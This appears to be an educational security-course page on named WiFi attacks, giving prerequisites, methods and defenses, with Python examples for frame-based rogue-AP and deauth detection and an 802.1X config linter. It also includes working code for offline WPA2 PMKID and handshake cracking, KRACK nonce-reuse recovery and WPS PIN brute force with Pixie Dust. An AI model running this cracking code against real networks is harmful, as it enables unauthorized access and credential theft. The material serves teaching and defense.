12.03 · Wireless & IoT

Wireless Attacks

The catalog of named attacks against WiFi. Each one has a prerequisite, a move, and a specific defense. Memorize the names — they show up on every security cert and every pentest report.

WiFi attacks fall into three rough buckets: passive eavesdropping (someone listens), active deauth/disrupt (someone kicks clients off so they reconnect into a trap), and credential theft (someone captures handshakes or hashes and cracks them offline). The named attacks below are the ones that show up in real incident reports — not exhaustive, but the set any practitioner needs to recognize on sight.

Evil twin

Evil Twin AP
Active MitM · The most common WiFi attack against humans
Prereq
Attacker within RF range of victims. Knowledge of an SSID the victims trust, often learned from the probe requests their devices broadcast or from public AP maps.
Move
Attacker stands up an AP broadcasting the same SSID as the legitimate network, often on a different channel and at higher transmit power. Clients with that SSID saved auto-associate to whichever matching AP has the stronger signal. This works directly against open networks; against a PSK network the rogue must know the PSK, or fall back to an open SSID of the same name plus a captive-portal lure, because on current OSes the saved profile includes the security type. From there the attacker MitMs everything that isn't end-to-end encrypted and harvests credentials from any form the victim submits over plain HTTP.
Defense
For users: never auto-join open networks; disable auto-connect on saved public networks where the OS allows it. For enterprise: use 802.1X with mandatory RADIUS server-certificate validation; the certificate, not the SSID, is what binds the network to your organization. PMF (Protected Management Frames) removes the forged deauth that is normally used to push clients off the real AP, and a WIDS that alerts on unknown BSSIDs advertising your SSID catches the rogue itself.

Deauthentication & disassociation

Deauth Flood
DoS · Setup for evil twin or handshake capture
Prereq
Attacker within RF range. Knows the target BSSID and, for a targeted deauth, a client MAC (both visible in any monitor-mode scan); a broadcast-addressed deauth hits every client of the AP at once.
Move
Attacker sends forged 802.11 deauthentication (or disassociation) frames with the AP's MAC as source. Without PMF these are unauthenticated management frames, so the client can't tell them from the real thing; it complies and disconnects. Repeat at high rate to make the network unusable, or send one short burst to force a reconnect and capture the resulting 4-way handshake.
Defense
Protected Management Frames (PMF, 802.11w). Mandatory in WPA3, optional in WPA2. With PMF on, unicast deauth and disassociation frames are encrypted and integrity-protected under the session keys, and broadcast ones carry a MIC under the group integrity key, so forged frames fail verification and are dropped. Any AP that carries WPA3 certification supports it; turn it on, in "required" mode where the client fleet allows it and "optional" (capable) mode otherwise.
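
The detection side of the two attacks above (evil twin and deauth flood) as an added example, not code from the original page: a minimal parser for 802.11 beacon and deauthentication frames and a triage loop that flags a trusted SSID beaconed from an unknown BSSID (the same unknown-BSSID rule a WIDS uses to catch rogue APs) and a burst of deauth frames from one BSSID. The frames, MAC addresses, SSID and trusted-BSSID list are constructed here; a real deployment would feed it frames from a monitor-mode capture and tune the threshold.

```python
import struct
from collections import defaultdict

TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype, dst, src, bssid, body):
    """802.11 management header: FC(2) duration(2) addr1 addr2 addr3 seqctl(2), then the body."""
    fc = (subtype << 4) | (TYPE_MGMT << 2)  # protocol version 0, type 0 (management)
    return struct.pack("<BBH", fc, 0, 0) + dst + src + bssid + b"\x00\x00" + body


def beacon(bssid, ssid):
    """Beacon body: timestamp(8) interval(2) capability(2) then tagged params; tag 0 is the SSID."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    return build_mgmt(SUBTYPE_BEACON, mac("ff:ff:ff:ff:ff:ff"), bssid, bssid,
                      fixed + bytes([0, len(ssid)]) + ssid.encode())


def deauth(client, bssid, reason=7):
    """Deauth body is a 2-byte reason code; 7 (class 3 frame from non-associated STA) is a flood favourite."""
    return build_mgmt(SUBTYPE_DEAUTH, client, bssid, bssid, struct.pack("<H", reason))


def parse(frame):
    """Return a dict for management frames, None for anything else or anything too short."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != TYPE_MGMT:
        return None
    info = {"subtype": subtype, "dst": mac_str(frame[4:10]),
            "src": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    body = frame[24:]
    if subtype == SUBTYPE_BEACON and len(body) >= 12:
        tags, i = body[12:], 0
        while i + 2 <= len(tags):
            tid, tlen = tags[i], tags[i + 1]
            if tid == 0:
                info["ssid"] = tags[i + 2:i + 2 + tlen].decode(errors="replace")
                break
            i += 2 + tlen
    elif subtype == SUBTYPE_DEAUTH and len(body) >= 2:
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info


def triage(frames, trusted, flood_threshold=10, window=1.0):
    """frames: [(timestamp_seconds, raw_frame_bytes)]; trusted: {ssid: {bssid, ...}}.
    Alerts on (a) a trusted SSID beaconed by a BSSID not in the list (evil twin / rogue AP) and
    (b) flood_threshold deauth frames from one BSSID inside a sliding window."""
    alerts, flagged, recent = [], set(), defaultdict(list)
    for ts, raw in frames:
        p = parse(raw)
        if p is None:
            continue
        if p["subtype"] == SUBTYPE_BEACON:
            ssid = p.get("ssid")
            if ssid in trusted and p["bssid"] not in trusted[ssid] and p["bssid"] not in flagged:
                flagged.add(p["bssid"])
                alerts.append(("evil_twin", ssid, p["bssid"]))
        elif p["subtype"] == SUBTYPE_DEAUTH:
            times = recent[p["bssid"]]
            times.append(ts)
            while times and ts - times[0] > window:
                times.pop(0)
            if len(times) == flood_threshold:  # fire once each time the threshold is crossed
                alerts.append(("deauth_flood", p["bssid"], p["reason"]))
    return alerts


# Constructed capture: one real beacon, one rogue beacon for the same SSID, then a deauth burst
# spoofing the real AP's MAC as source (the forged frame that PMF would make fail verification).
TRUSTED = {"CorpWiFi": {"00:11:22:33:44:55"}}
REAL_AP, ROGUE_AP, CLIENT = mac("00:11:22:33:44:55"), mac("de:ad:be:ef:00:01"), mac("aa:bb:cc:dd:ee:01")


def sample_capture():
    frames = [(0.0, beacon(REAL_AP, "CorpWiFi")), (0.1, beacon(ROGUE_AP, "CorpWiFi"))]
    frames += [(0.2 + i * 0.05, deauth(CLIENT, REAL_AP)) for i in range(12)]
    return frames


if __name__ == "__main__":
    for alert in triage(sample_capture(), TRUSTED):
        print(alert)
```

On a PMF-enabled network the same forged frames are still visible on the air; the difference is that clients discard them, and most enterprise APs log the MIC failures, which is a cleaner signal than counting frames.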

Offline cracking flow

Handshake Capture + Offline Crack
Credential recovery · The classic WPA2-PSK attack
Prereq
Within RF range of a WPA2-PSK network with at least one active client. Tools: aircrack-ng or hcxdumptool + hashcat.
Move
Listen for a client connecting (the 4-way handshake). If no one's connecting, send a deauth to force a reconnect. Capture the EAPOL frames; messages 1 and 2 are sufficient (the AP's ANonce, the client's SNonce, and a MIC computed under a key derived from the PMK), though capturing all four is cleanest. Walk away. Run hashcat against the capture with a wordlist or rule-based mutator: each guess costs one PBKDF2 derivation of the PMK plus an HMAC, and a matching MIC means the guess is right. The PSK never crossed the air, but everything needed to test guesses offline did.
Defense
Long, random PSKs: 20+ characters from a generator, because the attacker's cost is one PBKDF2 run per guess and only the size of the guess space protects you. PMF prevents the deauth setup but not passive capture of a natural reconnect. WPA3-SAE removes the offline path: each passphrase guess requires a fresh online exchange with the AP, which can rate-limit it.
PMKID Attack
Credential recovery · No deauth, no waiting
Prereq
A vulnerable AP: many WPA2-PSK APs include the PMKID (in the RSN information element of EAPOL message 1) for any station that associates, even when no real client is connecting. Tool: hcxdumptool.
Move
Attacker authenticates and associates with the AP itself. The AP responds with EAPOL message 1 carrying PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC), truncated to 128 bits. The attacker knows every input except the PMK, so that one value is enough to start testing passphrase guesses offline: no client needs to be online, no deauth, no waiting.
Defense
Update AP firmware so the PMKID is only sent when it serves a purpose (PMK caching for roaming); most current firmware does. Strong PSK and/or WPA3-SAE remain the durable answers, because the PMKID is useless to an attacker who cannot guess the passphrase.
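
How the offline step actually works for both paths above (the handshake MIC and the PMKID), as an added example that is not code from the page, hashcat or hcxdumptool. It derives the PMK exactly as 802.11i does, recomputes the PMKID and the handshake MIC for each wordlist candidate, and stops on a match. The SSID, MAC addresses, nonces, passphrase, wordlist and the "captured" message-2 frame are constructed inside the block so it runs offline; the MIC check assumes WPA2 key descriptor version 2 (HMAC-SHA1), the CCMP case.

```python
import hashlib
import hmac


def pmk_from_psk(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). This is the cost per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def ptk_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN));
    the first 16 bytes of the PTK are the KCK that authenticates EAPOL-Key frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return ptk[:16]


# EAPOL-Key layout: 802.1X hdr(4) desc(1) keyinfo(2) keylen(2) replay(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16) ...
MIC_OFFSET = 81


def eapol_mic(kck, frame):
    """WPA2 key-descriptor version 2: MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """PMKID path: one PBKDF2 plus one HMAC per guess, no client traffic needed."""
    for cand in wordlist:
        if pmkid(pmk_from_psk(cand, ssid), ap_mac, sta_mac) == captured_pmkid:
            return cand
    return None


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, m2, wordlist):
    """Handshake path: recompute the KCK from the guess and the captured nonces, check M2's MIC."""
    captured_mic = m2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        kck = ptk_kck(pmk_from_psk(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if eapol_mic(kck, m2) == captured_mic:
            return cand
    return None


# --- constructed "capture" (no real network involved) ---
SSID = "CorpGuest"
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("aabbccddee01")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
TRUE_PSK = "sunflower2020"
WORDLIST = ["password", "letmein", "sunflower", "sunflower2020", "Sunflower2020!"]


def build_m2(kck):
    """EAPOL-Key message 2 as the client would send it: SNonce plus a valid MIC under the real KCK."""
    key_info = 0x010a  # descriptor version 2 (HMAC-SHA1), pairwise, MIC bit
    frame = (bytes([2, 3]) + (95).to_bytes(2, "big")               # 802.1X: version, type EAPOL-Key, body length
             + bytes([2]) + key_info.to_bytes(2, "big")             # RSN key descriptor, key info
             + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")     # key length, replay counter
             + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # nonce, IV, RSC, key ID
             + b"\x00" * 16 + (0).to_bytes(2, "big"))               # MIC placeholder, key data length
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def demo():
    """What the attacker collects (PMKID from M1, M2 from a real client) and what each path recovers."""
    true_pmk = pmk_from_psk(TRUE_PSK, SSID)
    captured_pmkid = pmkid(true_pmk, AP, STA)
    captured_m2 = build_m2(ptk_kck(true_pmk, AP, STA, ANONCE, SNONCE))
    return (crack_pmkid(captured_pmkid, SSID, AP, STA, WORDLIST),
            crack_handshake(SSID, AP, STA, ANONCE, SNONCE, captured_m2, WORDLIST))


if __name__ == "__main__":
    print(demo())
```

Both paths reduce to "derive a PMK from this guess and test it", which is why the defense is the same for both: the PBKDF2 cost is fixed, so only the number of guesses an attacker must make (the passphrase's entropy) changes the outcome.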

Key-reuse attacks · KRACK

KRACK · Key Reinstallation Attacks
Active MitM · Vanhoef & Piessens, 2017
Prereq
A channel-based MitM position between client and AP: the attacker clones the real AP on another channel so it can intercept, delay and replay handshake frames. Unpatched client or AP.
Move
Attacker blocks message 4 from reaching the AP, so the AP retransmits message 3. The client, following the handshake state machine as the standard then described it, reinstalls the already-installed PTK, which resets the CCMP packet number (the per-frame nonce) to zero. With nonce reuse the same AES-CCMP keystream encrypts different frames; XORing two such ciphertexts yields the XOR of their plaintexts, and known plaintext in one frame exposes the other. Android 6.0+ and Linux were the worst case because of a wpa_supplicant bug (versions 2.4 and later at the time) that installed an all-zero key on reinstallation, making traffic decryptable outright.
Defense
Patched in 2017-2018 across all major OSes and firmware; the fix is to never reinstall an already-installed key, so a retransmitted message 3 is acknowledged without resetting counters. Modern devices are not vulnerable. Status today: historically important, no longer a live threat against patched devices; still worth checking on long-lived IoT firmware that never got the update.
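
The reinstallation bug as a state machine, an added example that is not from the page or from the KRACK paper. Two clients receive a replayed message 3: the vulnerable one re-runs the key install and resets its packet number, the patched one acknowledges without touching counters. The keystream function is a stand-in (HMAC-SHA1 over key and packet number) for the AES-CCM counter-mode keystream; the nonce-reuse consequence shown is the same for any counter-mode cipher. The PTK and both plaintexts are constructed.

```python
import hashlib
import hmac


def keystream(ptk, pn, n):
    """Stand-in for the CCMP counter-mode keystream: a PRF of (key, packet number, block counter).
    Real CCMP uses AES; what matters here is that the stream depends only on the key and the nonce."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(ptk, pn.to_bytes(6, "big") + ctr.to_bytes(2, "big"), hashlib.sha1).digest()
        ctr += 1
    return out[:n]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class Client:
    """Supplicant data-confidentiality state after the 4-way handshake."""

    def __init__(self, patched):
        self.patched = patched
        self.ptk = None
        self.installed = False
        self.pn = 0          # CCMP packet number: the per-frame nonce, must never repeat under one key
        self.sent = []       # (pn, ciphertext) as an on-air observer would see them

    def on_msg3(self, ptk):
        """Message 3 is legitimately retransmitted when message 4 is lost, so it must be answered.
        The KRACK bug is re-running the key install (which zeroes the packet number) on the retransmit."""
        if self.patched and self.installed and ptk == self.ptk:
            return "msg4"    # patched: acknowledge, keep the installed key and its counters
        self.ptk, self.installed, self.pn = ptk, True, 0
        return "msg4"

    def send(self, plaintext):
        ct = xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))
        self.sent.append((self.pn, ct))
        self.pn += 1
        return ct


SECRET = b"token=7f3a9c2d1e"   # 16 bytes the victim sends first (constructed)
KNOWN = b"GET /index.html "    # 16 bytes the attacker can predict or induce (constructed)


def attack(patched):
    """Channel-based MitM: forward message 3, let the client send data, replay message 3, collect."""
    c = Client(patched)
    ptk = hashlib.sha256(b"constructed PTK").digest()
    c.on_msg3(ptk)           # first delivery: key installed, pn = 0
    c.send(SECRET)           # frame 1 under pn = 0
    c.on_msg3(ptk)           # replayed message 3: a vulnerable client resets pn to 0
    c.send(KNOWN)            # frame 2: the vulnerable client reuses pn = 0
    same_nonce = [ct for pn, ct in c.sent if pn == 0]
    if len(same_nonce) < 2:
        return None          # no nonce reuse, nothing to recover
    ct1, ct2 = same_nonce
    # ct1 ^ ct2 = (p1 ^ ks) ^ (p2 ^ ks) = p1 ^ p2; the known p2 gives p1
    return xor(xor(ct1, ct2), KNOWN)


if __name__ == "__main__":
    print("vulnerable:", attack(False))
    print("patched:   ", attack(True))
```

The all-zero-key variant is worse than what is shown here: with a known key the attacker needs no second frame at all and simply decrypts.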

WPS attacks

WPS PIN Brute Force
Credential recovery · Viehböck, 2011
Prereq
AP with WPS PIN authentication enabled. (Many consumer routers ship with it on by default.)
Move
The registrar checks the PIN in two halves: a wrong first half is rejected at message M4, a wrong second half at M6, and the eighth digit is a checksum of the first seven. So the search space is 10^4 + 10^3 = 11,000 guesses instead of 10^8. Try every PIN with reaver. Once the PIN is recovered, the AP hands the attacker the actual WPA passphrase (in message M7). Total time: hours.
Defense
Disable WPS entirely; it is the only correct answer. Some APs advertise a lockout after N failed attempts, but the lockout is a rate limit, not a refusal: given time, the PIN falls.
Pixie Dust
Credential recovery · Bongard, 2014
Prereq
AP with WPS enabled and a vulnerable WPS implementation, particularly older Broadcom, Realtek and Ralink chipsets whose secret nonces E-S1/E-S2 are generated with weak or no randomness (on some, they are all zeros).
Move
Run one WPS exchange far enough to collect M1 through M3: the two Diffie-Hellman public keys, the nonces and the AP's E-Hash1/E-Hash2, which commit to the two PIN halves under E-S1/E-S2. Because those secret nonces are predictable, the attacker recomputes the hashes for every half-candidate offline and recovers the PIN in seconds. Tool: reaver with -K (which calls pixiewps).
Defense
Same as above — disable WPS. Hardware-level fix would require new chipsets, which has happened for new APs but not for the millions of consumer routers still in service.
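
Both WPS attacks above in working form, as an added example that is not code from reaver or pixiewps: the PIN checksum, a stand-in registrar that rejects each half separately (the two-stage check that makes the online search 10^4 + 10^3), and the Pixie Dust offline check against E-Hash1/E-Hash2 with all-zero E-S1/E-S2. AuthKey, the Diffie-Hellman public keys and the PIN are constructed; in a real exchange AuthKey is derived from the DH shared secret and the nonces, and the two hashes come from M3.

```python
import hashlib
import hmac


def wps_checksum(first7):
    """Checksum for the 8th digit of a WPS PIN; only 7 digits are free."""
    accum, p = 0, first7
    while p:
        accum += 3 * (p % 10)
        p //= 10
        accum += p % 10
        p //= 10
    return (10 - accum % 10) % 10


def make_pin(first7):
    return f"{first7:07d}{wps_checksum(first7)}"


class Registrar:
    """Stand-in for the AP's WPS registrar with the protocol's two-stage check: the first PIN half
    is verified at M4 and the second at M6, and each failure is signalled separately."""

    def __init__(self, pin):
        self.pin, self.attempts = pin, 0

    def try_pin(self, pin):
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK@M4"
        if pin[4:] != self.pin[4:]:
            return "NACK@M6"
        return "M7"   # M7 carries the WPA passphrase to the enrollee


def online_bruteforce(reg):
    """reaver's strategy: up to 10^4 guesses fix the first half, then up to 10^3 (checksum forced) the second."""
    for h1 in range(10_000):
        if reg.try_pin(f"{h1:04d}0000") != "NACK@M4":
            break
    else:
        return None
    for h2 in range(1_000):
        pin = make_pin(h1 * 1_000 + h2)
        if reg.try_pin(pin) == "M7":
            return pin
    return None


# --- Pixie Dust: the same two halves, tested offline against M3's commitments ---

def psk_half(auth_key, half):
    """PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII)."""
    return hmac.new(auth_key, half.encode(), hashlib.sha256).digest()[:16]


def e_hash(auth_key, es, half, pke, pkr):
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR), sent by the AP in M3."""
    return hmac.new(auth_key, es + psk_half(auth_key, half) + pke + pkr, hashlib.sha256).digest()


def pixie_dust(auth_key, pke, pkr, e_hash1, e_hash2, es1=b"\x00" * 16, es2=b"\x00" * 16):
    """With predictable E-S1/E-S2 (all zeros here, the classic broken-RNG case), every candidate half
    is checked against the captured hashes without sending another frame to the AP."""
    h1 = next((f"{i:04d}" for i in range(10_000)
               if e_hash(auth_key, es1, f"{i:04d}", pke, pkr) == e_hash1), None)
    if h1 is None:
        return None
    for i in range(1_000):
        pin = make_pin(int(h1) * 1_000 + i)
        if e_hash(auth_key, es2, pin[4:], pke, pkr) == e_hash2:
            return pin
    return None


# Constructed values; a real AuthKey comes from the DH shared secret and both nonces.
TRUE_PIN = make_pin(1234567)                              # "12345670"
AUTH_KEY = hashlib.sha256(b"constructed AuthKey").digest()
PKE = hashlib.sha256(b"constructed PKE").digest() * 6     # 192-byte DH public keys
PKR = hashlib.sha256(b"constructed PKR").digest() * 6


def demo_online():
    reg = Registrar(TRUE_PIN)
    return online_bruteforce(reg), reg.attempts


def demo_pixie():
    zero = b"\x00" * 16
    e1 = e_hash(AUTH_KEY, zero, TRUE_PIN[:4], PKE, PKR)   # what a weak-RNG AP puts in M3
    e2 = e_hash(AUTH_KEY, zero, TRUE_PIN[4:], PKE, PKR)
    return pixie_dust(AUTH_KEY, PKE, PKR, e1, e2)


if __name__ == "__main__":
    print(demo_online(), demo_pixie())
```

The online path never needs more than 11,000 registrar round trips; the offline path needs one. A lockout counter slows only the first, and neither is affected by how strong the WPA passphrase is, which is why the answer is to turn WPS off rather than to harden it.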

Reconnaissance · war driving

War Driving
Reconnaissance · A 2001-era term, still in use
Prereq
Vehicle, laptop or phone with a monitor-mode-capable WiFi card, plus GPS. Tools: Kismet, the WiGLE app, airodump-ng.
Move
Drive around collecting beacons. Each beacon advertises SSID, BSSID, channel and supported security. With GPS the attacker builds a map of every AP in a neighborhood, including which ones are WPA2/WPA3, which are still open, and which are still on WEP. Upload to WiGLE.net and the data merges with a global database of over a billion networks.
Defense
There's no defense against passive observation of your beacons — beacons exist to be seen. The actual defense is operational: don't be the WEP AP on the map. Audit your perimeter periodically; check WiGLE for what's broadcasting from your address.

Rogue APs & karma attacks

Rogue AP (insider variant)
Policy breach · The one the security team will actually catch
Prereq
An employee plugs an unmanaged AP into a corporate ethernet jack. Could be a personal travel router, a cheap consumer AP, or even a phone with hotspot bridged to ethernet.
Move
Not strictly an "attack" — the threat is that the rogue AP bypasses the organization's NAC and provides an undefended bridge from outside (WiFi) into inside (LAN). External attackers crack the rogue's PSK or use its open SSID; from there they're inside.
Defense
802.1X on every wired port, so an AP that can't authenticate gets no LAN. Wireless intrusion detection (WIDS) on enterprise APs alerts on unfamiliar BSSIDs, especially ones advertising your own SSIDs. Switchport security that binds MACs to ports raises the bar, but a router that clones the MAC of the device it replaced walks through it. Periodic walk-around audits with a wireless scanner remain underrated.
Karma / Probe-Response Spoofing
Active MitM · Variant of evil twin
Prereq
Within RF range of victim devices. Tool: hostapd-wpe, EAPHammer or a WiFi Pineapple.
Move
Older phones and laptops broadcast directed probe requests for every SSID in their saved-networks list. The attacker's AP answers "yes, I'm that network" to every probe. Clients that trust a network by name alone auto-associate. Originally devastating; modern OSes no longer probe for most saved networks (hidden ones excepted) and refuse to join an open network whose SSID matches a saved secured profile, but saved open networks are still trusted by name only.
Defense
Same as evil twin: 802.1X with cert validation. Remove saved open networks. Recent iOS and Android expose a per-network auto-join switch; turn it off for public SSIDs so the device only joins them when you tell it to.

Captive portal phishing

Captive Portal Phishing
Credential theft · Hotel WiFi grade
Prereq
Evil twin already in place, broadcasting an open SSID. Tool: Wifiphisher.
Move
Victim joins the evil twin (open, no PSK required). The attacker's DHCP server hands out the rogue AP as gateway and DNS. Any plain-HTTP request, including the OS's own captive-portal connectivity probe, is redirected to a page that says "Please re-enter your WiFi password for security" or imitates a hotel/airport login form. The victim types a corporate password or PSK. Done.
Defense
User education: a legitimate network never asks for its own password after you've joined. Browsers refusing to load HTTPS sites behind a captive portal are a feature, not a bug; don't click through certificate warnings. Enterprise: EAP-TLS with client certificates, so there is no reusable password for a portal to harvest.

Enterprise-specific · the cert-validation attack

802.1X / PEAP Credential Capture
Credential theft · The biggest gap in enterprise WiFi
Prereq
Enterprise SSID using PEAP-MSCHAPv2 or EAP-TTLS. Clients not configured to validate the RADIUS server certificate against a specific CA and server name.
Move
Attacker stands up an evil-twin AP with the same SSID, running hostapd-wpe or EAPHammer with a self-signed cert. The victim's phone or laptop attempts auto-join. Without cert validation the client accepts the rogue cert, builds the TLS tunnel to the attacker, and runs the inner authentication: for MSCHAPv2 that means handing over a challenge/response pair that is crackable offline by dictionary, or exhaustively through its single DES key (2^56); for EAP-TTLS with PAP the password arrives in the clear inside the tunnel. Attacker walks away with the user's domain credentials.
Defense
Deploy enterprise WiFi profiles that mandate RADIUS cert validation against a specific CA and server name: group policy on Windows, MDM on iOS/Android, NetworkManager or wpa_supplicant profiles with ca_cert and domain_suffix_match on Linux. Without that step PEAP/MSCHAPv2 authenticates the user to anyone who asks. The strongest answer is EAP-TLS with per-user client certs, which leaves no password to capture.
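
One way to catch the misconfiguration above before an evil twin does, as an added example that is not code from the page or from the wpa_supplicant project: a linter over wpa_supplicant network blocks that flags 802.1X profiles with no CA pin (ca_cert or ca_path) or no server-name check (domain_match, domain_suffix_match and friends). The two configs are constructed; the option names are real wpa_supplicant.conf keys, while the paths, SSIDs and identities are placeholders. The same checks map onto the "validate server certificate", "trusted root CA" and "server names" fields of Windows and MDM profiles.

```python
import re

# Constructed wpa_supplicant.conf excerpts: the weak profile, then the corrected PEAP and EAP-TLS forms.
WEAK_CONF = '''
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
'''

HARDENED_CONF = '''
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="alice@corp.example"
    client_cert="/etc/wpa/alice.pem"
    private_key="/etc/wpa/alice.key"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
}
'''

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
KV_RE = re.compile(r'^\s*(\w+)=("?)(.*?)\2\s*$', re.M)

CA_KEYS = ("ca_cert", "ca_path")
NAME_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(conf):
    """Split a wpa_supplicant config into its network blocks as {key: value} dicts."""
    return [{k: v for k, _, v in KV_RE.findall(body)} for body in BLOCK_RE.findall(conf)]


def lint(net):
    """Findings for one network block; an empty list means the server is pinned adequately."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return findings                      # PSK, open or SAE profiles: not an 802.1X question
    if not any(k in net for k in CA_KEYS):
        findings.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(k in net for k in NAME_KEYS):
        findings.append("no domain_match/domain_suffix_match: any certificate from the CA is accepted")
    if findings and net.get("eap", "").upper() in ("PEAP", "TTLS") and "password" in net:
        findings.append("tunneled password method without server pinning: credentials go to an evil twin")
    return findings


def lint_conf(conf):
    """[(ssid, eap, findings), ...] for every network block in the config text."""
    return [(net.get("ssid"), net.get("eap"), lint(net)) for net in parse_networks(conf)]


if __name__ == "__main__":
    for ssid, eap, findings in lint_conf(WEAK_CONF) + lint_conf(HARDENED_CONF):
        print(ssid, eap, findings or ["OK"])
```

Pinning only the CA is not enough on its own: any certificate that CA has issued, including one for an unrelated host, would pass, which is what the domain match closes. Run the linter over the fleet's exported profiles rather than over one machine.
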

The pattern across these attacks: the attacker rarely breaks the cryptography. They exploit the gap: clients that auto-join based on SSID name, APs that include the PMKID for no reason, EAP methods deployed without cert validation, WPS turned on for "convenience." Most wireless defense is configuration policy, not new crypto.

Takeaway

Five things to walk away with: turn on PMF (defeats deauth-based setup), turn off WPS (closes the PIN attack class), require RADIUS cert validation on enterprise SSIDs (closes PEAP credential capture), use a strong PSK or WPA3-SAE (defeats offline cracking), and audit your perimeter (catches rogue APs and WEP holdouts).

Most of these are settings, not products. The hard part isn't knowing what to do — it's getting it deployed consistently across the BYOD fleet, the legacy APs, the printers that don't speak WPA3, and the IoT devices that don't speak anything secure at all.

Sources

  1. Vanhoef, M., & Piessens, F. (2017). Key reinstallation attacks: Forcing nonce reuse in WPA2. ACM CCS. https://www.krackattacks.com/
  2. Viehböck, S. (2011). Brute-forcing Wi-Fi Protected Setup. Self-published. https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
  3. Bongard, D. (2014). Offline bruteforce attack on Wi-Fi Protected Setup. PasswordsCon. https://www.youtube.com/watch?v=Ku-iRkUWb5g
  4. Steube, J. (2018). New attack on WPA/WPA2 using PMKID. Hashcat. https://hashcat.net/forum/thread-7717.html
  5. Bullock, B., & Kadijk, J. (2018). EAPHammer: targeted evil twin attacks against WPA2-Enterprise networks. https://github.com/s0lst1c3/eaphammer
  6. WiGLE. (2024). Worldwide wireless network mapping. https://wigle.net/